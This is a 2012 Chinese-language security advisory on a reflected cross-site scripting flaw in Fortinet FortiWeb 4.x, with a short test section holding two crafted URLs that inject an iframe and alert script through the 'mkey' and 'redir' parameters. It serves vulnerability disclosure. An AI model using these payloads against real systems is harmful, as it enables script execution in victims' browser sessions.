发布日期：2012-12-03
更新日期：2012-12-03

受影响系统：

Fortinet FortiWeb 4.x

描述：

---

BUGTRAQ  ID: 56774

FortiGate系列安全产品可检测和消除网络威胁。

Fortinet FortiWeb 4.43,build0657,120929及其他版本存在多个安全漏洞，"waf/pcre_expression/validate"（设置了"redir"后）的"mkey"参数值没有被正确过滤即被返回给用户，可导致在用户浏览器会话中执行任意HTML和脚本代码。

<*来源：Benjamin Kunz Mejri
  
  链接：http://secunia.com/advisories/51430/
        http://www.vulnerability-lab.com/download_content.php?id=702
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Benjamin Kunz Mejri （）提供了如下测试方法：

通过引诱受害者点击恶意URL链接的方式进行攻击，如下是恶意URL的例子：

https://www.example.com/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C

https://www.example.com/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0

参考自
http://www.securityfocus.com/bid/56774/exploit

建议：

---

厂商补丁：

Fortinet
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

https://www.fortinet.com/

浏览次数：2761
严重程度：0（网友投票）